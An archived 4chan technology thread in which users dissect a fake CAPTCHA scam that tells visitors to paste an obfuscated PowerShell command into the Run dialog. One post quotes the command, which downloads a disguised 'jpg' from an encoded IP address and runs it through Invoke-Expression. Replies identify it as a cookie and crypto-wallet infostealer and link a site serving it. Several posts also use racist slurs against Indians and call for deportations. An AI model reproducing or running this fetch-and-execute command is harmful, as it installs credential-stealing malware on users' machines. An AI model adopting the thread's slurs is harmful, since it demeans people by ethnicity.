[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vm / vmg / vr / vrpg / vst / w / wg] [i / ic] [r9k / s4s / vip] [cm / hm / lgbt / y] [3 / aco / adv / an / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / pw / qst / sci / soc / sp / tg / toy / trv / tv / vp / vt / wsg / wsr / x / xs] [Settings] [Search] [Mobile] [Home]
Board
Settings Mobile Home
/g/ - Technology


Thread archived.
You cannot reply anymore.


[Advertise on 4chan]


File: 1732327171087994.png (87 KB, 1499x583)
87 KB
87 KB PNG
It's sort of clever honestly.
>>
Pajeet ingenuity
>>
>>106805073
so what does the expression do? delete system32
>>
>>106805073
kek jeets

when we finally fix h1b and deport the ones that lied about credentials (and all the chain migrations they sponsored) those fuckers will probably be pretty good scammers

might have to geo-restrict most services harder
>>
>>106805093
I have no clue; i've never used powershell. Likely something to do with the website.
>>
File: 1730085066257109.jpg (1.64 MB, 1079x4527)
1.64 MB
1.64 MB JPG
>>106805073
>>106805093
>>106805118

Somebody decode the base64 please I'm lazy.

powershell $WkhsT1VrbFITV2RKZW10b1NWUTkdoSIZFVnFTWHBWYUVsVWEycEhOZVRSVFhWVmExWjNZa1ZHYWxirm "OX4D.5492705/x.jpg' |Invoke-Expression;$WkhsT1VrbFITV2RKZW10bExWjNZa1ZHYWxK
>>
File: 1736876156421294.png (70 KB, 2493x352)
70 KB
70 KB PNG
>>106805137
I suppose that semi-explains all of this going on when I reload the site. Also, here's the site I found the amazing captcha from.
>https://thehealthycompulsive.com/archetypal-jung/gratification/
>>
>>106805073
may Jagannath crush every street shitting poopjeet
>>
there's quite a lot of videos going over this and dissecting the powershell script it runs
https://www.youtube.com/watch?v=1tB5USD004w
tldw its basically a infostealer that sends browser cookies/crypto wallets to someone running a c&c server
>>
>>106805137
the one I found was curling some powershell script to execute, they spam latest news, like when latest shooter name drops, suddenly top google results throw this fake cloudflare captcha at you, pretty impressive
>>
>>106805073
>first step: open run command
surely to God people who's info is worth stealing aren't THIS stupid, right?
>>
>>106805694
most people dont know what win+r does lol
>>
File: file.png (41 KB, 468x707)
41 KB
41 KB PNG
>>106805137
neither of the strings are valid
>>
>>106806017
I think these $-prefixed strings are just there to obscure the actual payload which is embedded in the middle of the command (irm | invoke-expression)
I'm no powershell expert, but those look like references to nonexistent variables, effectively making them no-ops
>>
>>106805093
would be funny if it was actually just a captcha
>>
>>106806315
>irm | invoke-expression
So it uses Invoke-RestMethod to download a "JPG" from an obfuscated IP address and then runs it as a command.
The IP is 4D in hex followed by the last 3 bytes of the IP encoded as an integer.
>>
>>106806403
insane that there are still applications that accept any form of ipv4 addresses other than 4 dot separated decimals



[Advertise on 4chan]

Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.